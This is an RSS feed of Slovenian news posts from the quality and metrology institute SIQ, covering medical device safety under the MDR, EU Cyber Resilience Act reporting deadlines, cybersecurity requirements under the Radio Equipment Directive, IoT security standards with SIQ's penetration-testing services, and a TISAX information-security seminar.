<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Informacijske tehnologije Archives - SIQ</title>
	<atom:link href="https://www.siq.si/category/informacijske-tehnologije/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.siq.si/category/informacijske-tehnologije/</link>
	<description>Slovenski institut za kakovost in meroslovje</description>
	<lastBuildDate>Fri, 11 Sep 2026 06:57:41 +0000</lastBuildDate>
	<language>sl-SI</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.siq.si/wp-content/uploads/2018/10/cropped-fav-1-1-32x32.png</url>
	<title>Informacijske tehnologije Archives - SIQ</title>
	<link>https://www.siq.si/category/informacijske-tehnologije/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Od razvoja do pacienta: zagotavljanje varnosti medicinskih pripomočkov</title>
		<link>https://www.siq.si/novice/od-razvoja-do-pacienta-zagotavljanje-varnosti-medicinskih-pripomockov/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 08:03:56 +0000</pubDate>
				<category><![CDATA[Certificiranje organizacij]]></category>
		<category><![CDATA[Informacijske tehnologije]]></category>
		<category><![CDATA[Preskušanje in certificiranje proizvodov]]></category>
		<guid isPermaLink="false">https://www.siq.si/?post_type=news&#038;p=35749</guid>

					<description><![CDATA[<p>Zagotavljanje in preverjanje varnosti medicinskih pripomočkov je ključno za varno uporabo in za zaščito pacientov. Končni izdelek mora delovati zanesljivo in varno v vseh predvidenih pogojih uporabe, naj gre za preprost medicinski pripomoček ali kompleksno napravo. Varnost medicinskega pripomočka je treba obravnavati in obvladovati skozi celoten življenjski cikel izdelka – od načrtovanja in razvoja do [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/od-razvoja-do-pacienta-zagotavljanje-varnosti-medicinskih-pripomockov/">Od razvoja do pacienta: zagotavljanje varnosti medicinskih pripomočkov</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Zagotavljanje in preverjanje varnosti medicinskih pripomočkov je ključno za varno uporabo in za zaščito pacientov.</strong></p>
<p>Končni izdelek mora delovati zanesljivo in varno v vseh predvidenih pogojih uporabe, naj gre za preprost medicinski pripomoček ali kompleksno napravo. Varnost medicinskega pripomočka je treba obravnavati in obvladovati skozi celoten življenjski cikel izdelka – od načrtovanja in razvoja do preizkušanja, proizvodnje in uporabe. Proizvajalci morajo zato že v zgodnjih fazah razvoja upoštevati številne tehnične, klinične in zakonodajne zahteve.</p>
<p>Kot neodvisen preizkusni, certifikacijski in priglašeni organ za medicinske pripomočke <strong>SIQ</strong> proizvajalcem omogoča širok nabor storitev s področja preverjanja medicinskih pripomočkov. Od ugotavljanja skladnosti po <a href="https://www.siq.si/nase-dejavnosti/certificiranje-organizacij/predstavitev/medicina/mdr/">Uredbi (EU) MDR 2017/745</a> do preskušanja s področij električne varnosti, elektromagnetne združljivosti (EMC), kibernetske varnosti ter <a href="https://www.siq.si/izobrazevanje/program/#filter_cat=&amp;sub_id=medicinski-pripomo-ki-in-promet-z-zdravili">usposabljanja s področja tolmačenja zahtev standardov in veljavnih uredb</a>. S strokovnim znanjem in preizkusnimi zmogljivostmi na enem mestu lahko proizvajalcem pomaga pri preverjanju različnih vidikov varnosti izdelka skozi njegov celotni življenjski cikel.</p>
<h3><strong>Elektrika je nevarnost, na katero sploh ne pomislimo</strong></h3>
<p>Med ključnimi elementi preverjanja medicinskih pripomočkov je <a href="https://www.siq.si/nase-dejavnosti/preizkusanje-in-certificiranje-proizvodov/preskusanje-in-certificiranje-medicinskih-pripomockov/"><strong>preizkušanje električne varnosti</strong></a>. Pri električnih in elektronskih medicinskih pripomočkih se preverja, ali so zasnovani tako, da pri predvideni uporabi ne prinašajo nesprejemljivega tveganja za pacienta ali uporabnika. Pri tem se med drugim ocenjujejo <strong>zaščita pred električnim udarom</strong>, ustreznost izolacije ter nevarnosti, povezane s <strong>pregrevanjem, požarom</strong> in mehanskimi vplivi. Posebna pozornost je namenjena tudi delom pripomočka, ki prihajajo v neposreden stik s pacientom, saj morajo zagotavljati ustrezno raven zaščite tudi v primeru posamezne okvare. Preizkušanja tako potrjujejo, da so uporabljeni zaščitni <strong>ukrepi učinkoviti ne le pri običajnem delovanju, temveč tudi v razumno predvidljivih neugodnih razmerah</strong>.</p>
<h3><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-26691" style="font-size: 16px; font-weight: 400;" src="https://www.siq.si/wp-content/uploads/2022/06/GLAVNA_TEMA-crop.jpg" alt="" width="1200" height="800" srcset="https://www.siq.si/wp-content/uploads/2022/06/GLAVNA_TEMA-crop.jpg 1200w, https://www.siq.si/wp-content/uploads/2022/06/GLAVNA_TEMA-crop-300x200.jpg 300w, https://www.siq.si/wp-content/uploads/2022/06/GLAVNA_TEMA-crop-1024x683.jpg 1024w, https://www.siq.si/wp-content/uploads/2022/06/GLAVNA_TEMA-crop-768x512.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" /></h3>
<p>&nbsp;</p>
<h3><strong>V postopek preverjanja vključeni strokovnjaki </strong></h3>
<p><a href="https://eur-lex.europa.eu/legal-content/SL/TXT/PDF/?uri=CELEX:32017R0745">Evropska uredba o medicinskih pripomočkih (MDR)</a> določa zahteve, ki jih morajo proizvajalci izpolniti, da lahko svoje medicinske pripomočke dajo na trg Evropske unije. Za vsak pripomoček morajo dokazati skladnost s splošnimi zahtevami glede varnosti in učinkovitosti. To pomeni, da morajo prepoznati in ovrednotiti tveganja, dokazati varnost in učinkovitost pripomočka v predvidenih pogojih uporabe ter pripraviti obsežno tehnično dokumentacijo. Postopek ugotavljanja skladnosti je zaradi svoje kompleksnosti lahko dolgotrajen in traja tudi več kot leto in pol, saj mora priglašeni organ podrobno oceniti izpolnjevanje zahtev, povezanih z varnostjo in učinkovitostjo pripomočka.</p>
<p>Poleg pregleda tehnične dokumentacije je pomemben del postopka tudi presoja klinične evalvacije, s katero proizvajalec na podlagi ustreznih kliničnih dokazov utemeljuje, da <strong>je pripomoček varen in klinično učinkovit</strong> za predvideni namen uporabe. V proces ocenjevanja so glede na vrsto pripomočka vključeni strokovnjaki z različnimi strokovnimi znanji, med drugim s področij sterilizacije, biokompatibilnosti, električne varnosti in elektromagnetne združljivosti, programske opreme, umetne inteligence in drugih relevantnih tehničnih področij. Glede na namen uporabe pripomočka se vključujejo zdravniki specialisti z ustreznega medicinskega področja.</p>
<p>»Pri ocenjevanju varnosti in skladnosti EEG naprave se lahko prepletajo znanja različnih strokovnjakov – od nevrologov in drugih kliničnih strokovnjakov do strokovnjakov za biomedicinsko inženirstvo, električno varnost, elektromagnetno združljivost, programsko opremo in kibernetsko varnost. Prav interdisciplinarni pristop omogoča celovito oceno medicinskega pripomočka,« pojasnjuje <strong>dr. Peter Kramar</strong>, direktor področja za certificiranje medicinskih pripomočkov pri SIQ.</p>
<h3><strong>Pri vse večji povezljivosti pripomočkov pri varnosti ne sme biti kompromisov</strong></h3>
<p>Vsa ta znanja se vedno bolj povezujejo v sodobnih medicinskih pripomočkih, ki so vse bolj kompleksni in odvisni tudi od programske opreme in povezljivosti. Številni pripomočki so danes preko spleta povezani v oblak ter uporabljajo tehnologije, kot so umetna inteligenca,  vse več je tudi aktivnih medicinskih pripomočkov, ki se preko brezžičnih povezav povezujejo s pametnimi telefoni in drugimi napravami.</p>
<p>Z vse večjo povezljivostjo postaja za zagotavljanje varnosti vse pomembnejša tudi <a href="https://www.siq.si/nase-dejavnosti/informacijske-tehnologije/predstavitev/"><strong>kibernetska varnost</strong></a>. Medicinske pripomočke je treba zaščititi pred nepooblaščenimi dostopi, vdori in drugimi kibernetskimi grožnjami, saj lahko ti vplivajo tako na delovanje pripomočka kot tudi na varnost uporabnika in varovanje podatkov.</p>
<p>Pri elektronskih in brezžično povezanih medicinskih pripomočkih je treba zagotoviti tudi <strong>elektromagnetno združljivost</strong> in učinkovito rabo radijskega spektra, saj mora medicinski pripomoček delovati zanesljivo, ne da bi pri tem motil delovanje drugih naprav v svoji okolici. Hkrati morajo biti brezžične komunikacijske funkcionalnosti ustrezno preverjene in izpolnjevati zahteve, ki zagotavljajo njihovo varno in zanesljivo delovanje.</p>
<h3><strong>Umetna inteligenca v veliko pomoč, a zahteva nove varnostne mehanizme</strong></h3>
<p>Vse pomembnejšo vlogo ima tudi <strong>umetna inteligenca</strong>. Vedno več proizvajalcev se odloča za vključevanje rešitev, ki temeljijo na umetni inteligenci, v obstoječe medicinske pripomočke, ali pa z njeno pomočjo nadgrajujejo njihove funkcionalnosti. S tem se odpirajo nove možnosti za razvoj in uporabo medicinskih pripomočkov, hkrati pa se pojavljajo tudi novi izzivi na področju njihove varnosti, zanesljivosti in učinkovitosti.</p>
<p>Z uveljavitvijo <a href="https://artificialintelligenceact.eu/"><strong>evropskega Akta o umetni inteligenci</strong></a> (AI Akt, Uredba (EU) 2024/1689) bodo za medicinske pripomočke, ki vključujejo umetno inteligenco, veljale tudi dodatne zahteve. Proizvajalci bodo morali poleg že obstoječih zahtev za medicinske pripomočke upoštevati tudi vidike, povezane z varnostjo, delovanjem in obvladovanjem tveganj, ki izhajajo iz uporabe umetne inteligence. To bo še dodatno poudarilo potrebo po celovitem in interdisciplinarnem pristopu k razvoju, preverjanju in zagotavljanju skladnosti sodobnih medicinskih pripomočkov.</p>
<h3><strong>Regulacija je nuja za varnost pacientov in nadaljnji razvoj</strong></h3>
<p>Varnost medicinskega pripomočka je rezultat povezovanja regulativnih zahtev, kliničnega in drugega strokovnega znanja in različnih področij tehničnega preskušanja. SIQ s svojim strokovnim znanjem in širokim naborom storitev proizvajalcem omogoča podporo pri različnih vidikih ugotavljanja skladnosti in preverjanja varnosti – od MDR ocenjevanja do preizkušanja električne varnosti, elektromagnetne združljivosti in kibernetske varnosti.</p>
<p>Končni cilj je zagotoviti, da pripomoček izpolnjuje svoj predvideni namen ter da je njegova uporaba za pacienta in zdravstvenega delavca varna in zanesljiva. Pri tem sta ključna sodelovanje strokovnjakov z različnih področij in neodvisno preverjanje, ki omogočata objektivno oceno vseh pomembnih vidikov varnosti pripomočka.</p>
<p>The post <a href="https://www.siq.si/novice/od-razvoja-do-pacienta-zagotavljanje-varnosti-medicinskih-pripomockov/">Od razvoja do pacienta: zagotavljanje varnosti medicinskih pripomočkov</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Opomnik: CRA obveznosti poročanja se začnejo 11. septembra 2026</title>
		<link>https://www.siq.si/novice/opomnik-cra-obveznosti-porocanja-se-zacnejo-11-septembra-2026/</link>
		
		<dc:creator><![CDATA[Tina Predan]]></dc:creator>
		<pubDate>Wed, 19 Aug 2026 10:00:16 +0000</pubDate>
				<category><![CDATA[Informacijske tehnologije]]></category>
		<guid isPermaLink="false">https://www.siq.si/?post_type=news&#038;p=35677</guid>

					<description><![CDATA[<p>Spomnimo, da se 11. septembra 2026 začnejo uporabljati obveznosti poročanja v skladu z Aktom o kibernetski odpornosti (Cyber Resilience Act – CRA). Proizvajalci produktov z digitalnimi elementi bodo morali poročati o aktivno izkoriščanih ranljivostih in resnih varnostnih incidentih, ki vplivajo na varnost njihovih produktov. Čeprav končni naslov (URL) produkcijskega sistema za oddajo prijav še ni objavljen, je ENISA [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/opomnik-cra-obveznosti-porocanja-se-zacnejo-11-septembra-2026/">Opomnik: CRA obveznosti poročanja se začnejo 11. septembra 2026</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span lang="aa" data-olk-copy-source="MessageBody">Spomnimo, da se <b>11. septembra 2026</b> začnejo uporabljati obveznosti poročanja v skladu z <b>Aktom o kibernetski odpornosti (Cyber Resilience Act – CRA)</b>. Proizvajalci produktov z digitalnimi elementi bodo morali poročati o aktivno izkoriščanih ranljivostih in resnih varnostnih incidentih, ki vplivajo na varnost njihovih produktov.</span></p>
<p><span lang="aa">Čeprav končni naslov (URL) produkcijskega sistema za oddajo prijav še ni objavljen, je ENISA že vzpostavila spletno stran z informacijami o <b>Single Reporting Platform (SRP)</b>. Na voljo so navodila za registracijo uporabnikov, informacije o postopkih poročanja ter smernice glede vsebine in formata prijav.</span></p>
<p><span lang="aa">Organizacijam, ki jih bodo zahteve CRA zadevale, priporočamo, da se s postopki poročanja in zahtevami platforme seznanijo pravočasno ter preverijo svojo pripravljenost na izpolnjevanje novih obveznosti.</span></p>
<p><a href="https://www.enisa.europa.eu/topics/product-security/single-reporting-platform-srp"><span lang="aa">Več informacij</span></a></p>
<p><img decoding="async" class="alignnone wp-image-35678 size-full" src="https://www.siq.si/wp-content/uploads/2026/08/eye-futuristic-robot.jpg" alt="" width="1200" height="635" srcset="https://www.siq.si/wp-content/uploads/2026/08/eye-futuristic-robot.jpg 1200w, https://www.siq.si/wp-content/uploads/2026/08/eye-futuristic-robot-300x159.jpg 300w, https://www.siq.si/wp-content/uploads/2026/08/eye-futuristic-robot-1024x542.jpg 1024w, https://www.siq.si/wp-content/uploads/2026/08/eye-futuristic-robot-768x406.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" /></p>
<p>The post <a href="https://www.siq.si/novice/opomnik-cra-obveznosti-porocanja-se-zacnejo-11-septembra-2026/">Opomnik: CRA obveznosti poročanja se začnejo 11. septembra 2026</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Kibernetska varnost in Direktiva o radijski opremi (RED): v veljavi nove zahteve s področja kibernetske varnosti</title>
		<link>https://www.siq.si/novice/kibernetska-varnost-in-direktiva-o-radijski-opremi-red-v-veljavi-nove-zahteve-s-podrocja-kibernetske-varnosti/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Fri, 01 Aug 2025 06:41:00 +0000</pubDate>
				<category><![CDATA[Certificiranje organizacij]]></category>
		<category><![CDATA[Informacijske tehnologije]]></category>
		<category><![CDATA[Preskušanje in certificiranje proizvodov]]></category>
		<guid isPermaLink="false">https://www.siq.si/?post_type=news&#038;p=33934</guid>

					<description><![CDATA[<p>Kibernetska varnost postaja vse pomembnejša – tudi na ravni izdelkov. S prvim avgustom 2025 so v okviru Direktive o radijski opremi (RED) začele veljati prve obvezne zahteve s področja kibernetske varnosti, in sicer po 3. členu(3.3 d), (e) in (f). Te zahteve uvajajo zavezujoče obveznosti v zvezi s: kibernetsko varnostjo (3.3 d), zaščito osebnih podatkov [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/kibernetska-varnost-in-direktiva-o-radijski-opremi-red-v-veljavi-nove-zahteve-s-podrocja-kibernetske-varnosti/">Kibernetska varnost in Direktiva o radijski opremi (RED): v veljavi nove zahteve s področja kibernetske varnosti</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Kibernetska varnost postaja vse pomembnejša – tudi na ravni izdelkov. S prvim avgustom 2025 so v okviru <strong>Direktive o radijski opremi (RED) </strong>začele veljati prve obvezne zahteve s področja kibernetske varnosti, in sicer po 3. členu(3.3 d), (e) in (f).</p>
<p>Te zahteve uvajajo zavezujoče obveznosti v zvezi s:</p>
<ul>
<li>kibernetsko varnostjo (3.3 d),</li>
<li>zaščito osebnih podatkov (3.3 e),</li>
<li>zaščito pred goljufijami (3.3 f).</li>
</ul>
<p><strong>Storitve SIQ na področju skladnosti s kibernetsko varnostjo</strong></p>
<p>V SIQ Ljubljana nudimo širok in celovit nabor storitev s področja kibernetske varnosti, ki pokrivajo tako potrebe na ravni izdelkov kot organizacij. Naše dejavnosti vključujejo:</p>
<ul>
<li>Preskušanje kibernetske varnosti izdelkov (trenutno predvsem po standardih EN 18031-x in ETSI EN 303 645 ter v skladu s prihajajočimi zahtevami RED). SIQ je tudi priglašeni organ za <a href="https://www.siq.si/nase-dejavnosti/preizkusanje-in-certificiranje-proizvodov/kibernetska-varnost-za-povezljive-izdelke/">področje 3.3 d, e, f v okviru Direktive RED</a>.</li>
<li>Izvajanje <a href="https://www.siq.si/nase-dejavnosti/informacijske-tehnologije/storitve/penetracijski-test-notranje-n-zunanje-infrastrukture/">penetracijskih testov</a> (kibernetskih testov) na omrežjih, spletnih in mobilnih aplikacijah (za bančni sektor, zavarovalnice, proizvajalce ipd.).</li>
<li><a href="https://www.siq.si/nase-dejavnosti/certificiranje-organizacij/predstavitev/informacijska-varnost/">Ocenjevanje in certificiranje sistemov informacijske varnosti</a> po standardih ISO 27001, ISO 22301.</li>
<li>Izvedba pregledov in preverjanj skladnosti informacijskih sistemov z lokalno in evropsko zakonodajo po naročilu.</li>
<li>Usposabljanje kadrov za procese informacijske varnosti.</li>
</ul>
<p><strong>Ozadje 3. člena Direktive RED – kaj se spreminja?</strong></p>
<p>Direktiva Evropske komisije o radijski opremi (2014/53/EU) določa osnovne zahteve za:</p>
<ul>
<li>varovanje zdravja in varnost,</li>
<li>elektromagnetno združljivost (EMC),</li>
<li>učinkovito uporabo radijskega spektra.</li>
</ul>
<ol>
<li>člen (3.3) uvaja <strong>dodatne zahteve za določene kategorije radijske opreme</strong>. Dne 12. januarja 2022 je EU sprejela Delegirano uredbo (EU) 2022/30, ki aktivira 3.3 (d), (e) in (f) z obveznim datumom skladnosti 1. avgusta 2025. Ta uredba uveljavlja ključne določbe glede:</li>
</ol>
<ul>
<li>kibernetske varnosti,</li>
<li>zaščite osebnih podatkov in</li>
<li>preprečevanja goljufij</li>
</ul>
<p>za vse ustrezne brezžične naprave, ki vstopajo na trg EU.</p>
<p>Proizvajalcem je bil namenjen 42-mesečni prehodni rok, od februarja 2022 do avgusta 2025, da uskladijo svoje izdelke in dokumentacijo z novimi zahtevami.</p>
<p>V primeru preskušanja skladnosti ali sodelovanja priglašenega organa so za natančno oceno potrebni določeni začetni tehnični podatki in dokumentacija o izdelku. Naši strokovnjaki vas bodo z veseljem vodili skozi celoten postopek.</p>
<p>Naj vam pomagamo zagotoviti, da bodo vaši izdelki pripravljeni na kibernetske izzive prihodnosti.</p>
<p><strong>Več informacij:</strong></p>
<p>Jože Novak<br />
E-pošta: <a href="mailto:joze.novak@siq.si">joze.novak@siq.si</a><br />
Tel.: <a href="tel:0038614778034">+386 1 4778 034</a></p>
<p>The post <a href="https://www.siq.si/novice/kibernetska-varnost-in-direktiva-o-radijski-opremi-red-v-veljavi-nove-zahteve-s-podrocja-kibernetske-varnosti/">Kibernetska varnost in Direktiva o radijski opremi (RED): v veljavi nove zahteve s področja kibernetske varnosti</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Kibernetska (ne)varnost povezljivih naprav</title>
		<link>https://www.siq.si/novice/kibernetska-nevarnost-povezljivih-naprav/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Wed, 06 Nov 2024 07:56:58 +0000</pubDate>
				<category><![CDATA[Certificiranje organizacij]]></category>
		<category><![CDATA[Informacijske tehnologije]]></category>
		<category><![CDATA[Izobraževanje]]></category>
		<category><![CDATA[SIQ]]></category>
		<guid isPermaLink="false">https://www.siq.si/?post_type=news&#038;p=32150</guid>

					<description><![CDATA[<p>Z varnostnim pregledom in penetracijskim testom na SIQ do zagotavljanja varnosti in zanesljivosti Povezljivost naprav (IoT) je eden ključnih elementov sodobnega digitalnega ekosistema tako v vsakdanjem življenju kot tudi v poslovanju. Ko govorimo o pametnih domovih, povezljivih industrijskih sistemih ali uporabi v zdravstvu, postaja varnost teh naprav glavno in najpomembnejše vprašanje tako proizvajalcev kot tudi [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/kibernetska-nevarnost-povezljivih-naprav/">Kibernetska (ne)varnost povezljivih naprav</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>Z varnostnim pregledom in penetracijskim testom na SIQ do zagotavljanja varnosti in zanesljivosti</h3>
<p><img decoding="async" class="alignleft wp-image-32151 size-large" src="https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_24_resize-1024x569.jpg" alt="" width="1024" height="569" srcset="https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_24_resize-1024x569.jpg 1024w, https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_24_resize-300x167.jpg 300w, https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_24_resize-768x427.jpg 768w, https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_24_resize.jpg 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>Povezljivost naprav (IoT) je eden ključnih elementov sodobnega digitalnega ekosistema tako v vsakdanjem življenju kot tudi v poslovanju. Ko govorimo o pametnih domovih, povezljivih industrijskih sistemih ali uporabi v zdravstvu, postaja varnost teh naprav glavno in najpomembnejše vprašanje tako proizvajalcev kot tudi končnih uporabnikov. Razvoj kibernetske varnosti budno spremljajo in usmerjajo različne regulative, izvajanje <a href="https://www.siq.si/nase-dejavnosti/informacijske-tehnologije/predstavitev/"><strong>varnostnih pregledov in penetracijskih testov</strong></a> na strani proizvajalcev pa je bistvenega pomena za zagotavljanje varnosti in zanesljivosti.</p>
<p>V zadnjih letih je Evropska unija doživela izjemno povečanje kibernetskih napadov, ki so ogrozili varnost in stabilnost digitalnega prostora. Od leta 2022 do danes je bilo zabeleženih več milijonov napadov na različne sektorje in organizacije. Posebej zaskrbljujoče je povečanje števila kibernetskih napadov, usmerjenih neposredno na povezljive naprave, ki so postale del našega vsakdanjega življenja in gospodarstva. Čeprav natančna statistika o številu napadov na povezljive naprave morda ni na voljo, pa je jasno, da te predstavljajo pomembno tarčo za kibernetske napadalce, saj lahko napadi nanje povzročijo škodo tako na individualni kot na sistemski ravni.</p>
<h3>Proizvajalci bodo morali dokazovati skladnost s standardi</h3>
<p>Prvi praktičen obramben korak na strani EU je bil <strong>dodatek 3.3 k obstoječi direktivi za radijsko opremo</strong> RED 2014/53/EU, ki postavlja zahteve za radijsko opremo, vključno s povezljivimi napravami. Medtem ko je bil prvotni poudarek te direktive na tehnični združljivosti in učinkovitosti radijskega spektra, je vedno bolj v ospredju tudi varnost. <strong>Nove zahteve direktive bodo stopile v veljavo predvidoma s 1. 8. 2025</strong>, ko bodo proizvajalci širokega spektra povezljive opreme postali primorani dokazovati <strong>skladnost tudi na področju kibernetske varnosti</strong>.</p>
<p>Proti koncu leta 2024 se pričakuje tudi potrditev <strong>Akta o kibernetski odpornosti</strong> (Cyber Resilience Act – CRA), ki bo še dodatno okrepil zahteve za varnost povezljivih naprav. Zahteval bo celovit pristop k varnosti v digitalnem prostoru, vključno z rednimi pregledi in testiranjem, da bi se zagotovila sistemska odpornost proti kibernetskim napadom.</p>
<p>Poglaviten izziv za celoten ekosistem je, kako zagotoviti skladnost in kateri so relevantni standardi. Regulativa namreč opisuje veliko aktivnosti in ciljev, ki bodo morali biti izpolnjeni, ne opredeljuje pa dejanskih metod in postopkov. Prav tako ni še veliko primerov dobrih praks niti jasnih navodil nacionalnih regulatorjev (primer FDA za medicinske naprave v Združenih državah Amerike). Na tehničnem nivoju bo potreben razvoj dodatnih standardov za pokritje različnih novih storitev in izdelkov (na primer spletne ali mobilne aplikacije).</p>
<p>Trenutno se uporabljajo obstoječi standardi, ki pokrivajo določene aspekte ali proizvode, a bodo ti v večji meri v bližnji prihodnosti nadgrajeni. Najdemo jih v različnih industrijah, vključno s potrošniško elektroniko, medicinsko tehnologijo in industrijsko avtomatizacijo.</p>
<p><img loading="lazy" decoding="async" class="alignleft wp-image-32152 size-large" src="https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_241_resize-1024x683.jpg" alt="" width="1024" height="683" srcset="https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_241_resize-1024x683.jpg 1024w, https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_241_resize-300x200.jpg 300w, https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_241_resize-768x512.jpg 768w, https://www.siq.si/wp-content/uploads/2024/11/Informacijske_tehnologije_241_resize.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<h3>Standardi</h3>
<ul>
<li><strong>Standard EN 303 645</strong> se osredotoča na varnost povezljivih naprav v <strong>potrošniškem sektorju</strong>. Določa zahteve glede varnosti podatkov, varnosti komunikacijskih povezav in zagotavljanja zasebnosti uporabnikov.</li>
<li><strong>Standard ISA/IEC 62443</strong> je namenjen varnosti <strong>industrijske avtomatizacije in nadzora</strong>. Vključuje celovit pristop k varnosti, ki zajema tako tehnične kot organizacijske vidike varnosti informacijskih sistemov.</li>
<li><strong>Standard IEC/EN 81000-5-1</strong> se osredotoča na zahteve za varnost programske opreme v<strong> medicinskih napravah</strong> in je ključnega pomena za zagotavljanje procesov in izpolnjevanja osnovnih tehničnih zahtev varnosti. Standard predvideva tudi <a href="https://www.siq.si/nase-dejavnosti/informacijske-tehnologije/predstavitev/"><strong>penetracijske teste na samih medicinskih napravah</strong></a>.</li>
</ul>
<h2></h2>
<h2>Penetracijski testi za učinkovito borbo proti grožnjam in sistemski pristop k upravljanju varnosti</h2>
<p>Organizacija OWASP (Open Web Application Security Project) redno izdaja sezname najpogostejših ranljivosti v različnih digitalnih okoljih, vključno z internetom stvari (IoT). Njihov seznam <strong>OWASP IoT Top 10</strong> identiﬁcira najbolj kritične ranljivosti, ki ogrožajo varnost povezljivih naprav in njihovih sistemov. Da bi se učinkovito borili proti tem grožnjam, je ključno izvajati ustrezne teste, ki odkrivajo in odpravljajo te ranljivosti.<br />
Medtem ko je izvajanje varnostnih pregledov in penetracijskih testov pomembno za zagotavljanje varnosti povezljivih naprav, pa je na drugi strani pomembno tudi, da organizacije vzpostavijo celovite sisteme upravljanja informacijske varnosti. Med najbolj priznanimi je standard ISO 27001.</p>
<p><strong>ISO 27001</strong> zagotavlja okvir za<strong> vzpostavitev, izvajanje, vzdrževanje in stalno izboljševanje sistema upravljanja informacijske varnosti v organizaciji.</strong> Ta standard zajema širok spekter dejavnosti, vključno s politikami, postopki, varnostnimi ukrepi in upravljanjem tveganj, ki so bistveni za učinkovito zaščito informacijskih sredstev. S celovitim pristopom standard zajame celotno organizacijo, ne le IT oddelek. Koristi uvedbe imajo ljudje, tehnologija in procesi.</p>
<h3>Kam se lahko obrnete po pomoč?</h3>
<p>Na <strong>SIQ Ljubljana</strong> podjetjem in organizacijam nudimo celovite storitve na področju informacijske varnosti, s katerimi vam pomagamo zagotoviti najvišjo raven varnosti vašega poslovanja. Od običajnih penetracijskih testov do testov IoT naprav ter varnostnih in revizijskih pregledov, certificiranja sistemov vodenja informacijske varnosti in usposabljanja zaposlenih.</p>
<p>Varnostni pregledi, penetracijski testi in drugi varnostni postopki so pomembni koraki pri doseganju skladnosti z zakonskimi zahtevami in zagotavljanju trajne odpornosti proti kibernetskim grožnjam. Rezultat celovitega pristopa je zagotavljanje neprekinjenega poslovanja, ki je danes ključnega pomena za ohranjanje ugleda in zaupanja.</p>
<p><a href="https://www.siq.si/nase-dejavnosti/informacijske-tehnologije/predstavitev/">Več informacij</a></p>
<p>The post <a href="https://www.siq.si/novice/kibernetska-nevarnost-povezljivih-naprav/">Kibernetska (ne)varnost povezljivih naprav</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Izvedli smo e-strokovno srečanje: Zagotavljanje zahtevane informacijske varnosti v avtomobilski industriji – sistem upravljanja varovanja informacij po zahtevah nove izdaje TISAX® VDA ISA 6.0</title>
		<link>https://www.siq.si/novice/izvedli-smo-e-strokovno-srecanje-zagotavljanje-zahtevane-informacijske-varnosti-v-avtomobilski-industriji-sistem-upravljanja-varovanja-informacij-po-zahtevah-nove-izdaje-tisax-vda-isa/</link>
		
		<dc:creator><![CDATA[Tina Predan]]></dc:creator>
		<pubDate>Fri, 15 Mar 2024 10:00:35 +0000</pubDate>
				<category><![CDATA[Informacijske tehnologije]]></category>
		<category><![CDATA[Izobraževanje]]></category>
		<category><![CDATA[SIQ]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>V torek, 12. marca 2024, smo uspešno izvedli strokovno srečanje, katerega namen je bil skupaj z udeleženci spregovoriti: kako dosegati pričakovanja in zahteve kupcev avtomobilske industrije, kako zagotavljati visoko kakovostne izdelke, ki izpolnjujejo ali presegajo pričakovanja strank, kako ravnati z informacijami občutljive narave, kako zagotavljati zahtevano raven varovanja informacij ter kako ohranjati in nadgrajevati znanje [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/izvedli-smo-e-strokovno-srecanje-zagotavljanje-zahtevane-informacijske-varnosti-v-avtomobilski-industriji-sistem-upravljanja-varovanja-informacij-po-zahtevah-nove-izdaje-tisax-vda-isa/">Izvedli smo e-strokovno srečanje: Zagotavljanje zahtevane informacijske varnosti v avtomobilski industriji – sistem upravljanja varovanja informacij po zahtevah nove izdaje TISAX® VDA ISA 6.0</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
